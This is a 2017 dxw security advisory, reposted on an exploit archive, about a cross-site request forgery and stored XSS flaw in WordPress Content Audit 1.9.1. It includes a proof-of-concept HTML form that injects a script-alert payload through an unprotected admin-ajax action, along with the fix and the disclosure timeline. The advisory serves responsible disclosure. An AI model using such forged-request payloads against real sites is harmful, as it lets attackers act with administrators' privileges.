WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting

WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting: Posted Sep 28, 2017; Authored by Tom Adams; WordPress Content Audit plugin version 1.9.1 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | dc984adf5f9d9543aacd7fed916439032c04082b190d496601317b59fad3d41e; Download | Favorite | View

WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting

Details
================
Software: Content Audit
Version: 1.9.1
Homepage: https://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/csrf-xss-content-audit/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can

Vulnerability
================
The plugin contains an admin_ajax action which is not protected with a nonce. One of the values submitted appears unescaped on the list of pages.

Proof of concept
================

Install/activate the plugin
Make sure you have a post with ID=2 (or edit the HTML provided below)
Settings > Content Audit > select at least aPagesa for aAudited content typesa
Visit a page containing the below HTML
Click submit
VisitA http://localhost/wp-admin/edit.php?post_type=page to receive the XSS payload

<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit\">
 <input type=\"text\" name=\"post_ids[]\" value=\"2\">
 <input type=\"text\" name=\"_content_audit_owner\" value=\"Elliot Alderson\">
 <input type=\"text\" name=\"_content_audit_expiration_date\" value=\"2020-01-01\">
 <input type=\"text\" name=\"_content_audit_notes\" value=\"<script>alert(1)</script>\">
 <input type=\"submit\">
</form>
A 

Mitigations
================
Upgrade to version 1.9.2 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2017-08-21: Discovered
2017-09-08: Reported to vendor by email
2017-09-08: First response from vendor
2017-09-08: Vendor reports fixed in 1.9.2
2017-09-26: Advisory published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Top Authors In Last 30 Days

Red Hat 257 files
indoushka 108 files
Ubuntu 91 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,789)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,546)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,754)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting

WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting

Share This

WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems